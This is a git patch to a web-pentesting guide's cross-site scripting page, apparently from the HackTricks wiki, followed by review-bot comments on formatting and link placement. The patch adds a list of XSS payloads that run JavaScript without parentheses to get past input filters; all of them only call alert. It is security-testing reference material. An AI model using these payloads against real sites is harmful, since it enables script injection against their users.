From fd7e8de8d4799a4828434ea27e907da409be8ba2 Mon Sep 17 00:00:00 2001 From: CPol Date: Fri, 23 Sep 2022 09:06:24 +0000 Subject: [PATCH] GitBook: [#3501] No subject --- .../xss-cross-site-scripting/README.md | 20 +++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index e35bddea..8d3707c7 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -201,7 +201,7 @@ Some **examples**: When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\ For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_ +_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_ In this case and if no black/whitelisting is used, you could use payloads like: 
@@ -595,12 +595,23 @@ eval(8680439..toString(30))(983801..toString(36)) **JavaScript without parentheses** -```javascript +````javascript alert`1` eval.call`${'alert\x2823\x29'}` eval.apply`${[`alert\x2823\x29`]}` -``` +[].sort.call`${alert}1337` +[].map.call`${eval}\\u{61}lert\x281337\x29` +throw onerror=alert,1337 +Function`x${'alert\x281337\x29'}x``` +'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval} +valueOf=alert;window+'' +x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x +// or any DOMXSS sink such as location=name + +window.name='javascript:alert(1)' +Reflect.apply.call`${navigation.navigate}${navigation}${[name]}` +```` * [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md) * [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix) @@ -807,7 +818,7 @@ with(this) ### Obfuscation & Advanced Bypass -* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) \*\*\*\* +* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) * [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js) * [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs) * [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com) 
@@ -816,6 +827,7 @@ with(this) * More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) * [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html) * [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html) +* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses) ```javascript //Katana
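Review bot: the rewritten Note line in the `@@ -201,7` hunk still carries `**** ****` runs between the bold fragments around `-->` and `--!>`, so GitBook will keep re-escaping it on the next sync; write it as one italic sentence with plain code spans and no bold, i.e. _Note: an HTML comment can be closed using `-->` or `--!>`_. The unchanged paragraph it sits in also needs "the first thing you need to do is to check", "or if it is reflected" and "For these cases" in place of "if check", "of if" and "For this cases".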
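Review bot: the fence change from three to four backticks in the `@@ -595,12` hunk is required rather than cosmetic, because the added `Function` tagged-template payload ends in three backticks that would otherwise terminate the block; put a one-line comment at the top of the block saying so, or the next contributor will "fix" the fence back and break the page. Two other additions need a comment to be readable: `window.name='javascript:alert(1)'` is the setup for the `Reflect.apply.call` line beneath it (the `${[name]}` argument reads that value back), and `// or any DOMXSS sink such as location=name` describes the DOMMatrix line above it, not the `window.name` line below; as written both look like stray one-liners.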
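Review bot: the last bullet in the `@@ -807,7` hunk, `[https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)`, has link text and target that differ by a trailing slash; make them identical. Dropping the trailing `\*\*\*\*` after the aurebesh.js link is correct, and since that entry is the only one with a bold `**Different obfuscations in one page:**` label, the three bare-URL bullets under it would read better with the same label style.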
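Review bot: the new PortSwigger "seventh way to call a JavaScript function without parentheses" link in the `@@ -816,6` hunk is filed among the obfuscation references (JSFuck, jjencode, aaencode), but it belongs with the two parentheses-free references (the RenwaX23 list and the DOMMatrix article) that sit under **JavaScript without parentheses** in the earlier hunk, where readers of those payloads will look for it; move it there or add a cross-reference. The context line above it also has "sofisticated" for "sophisticated".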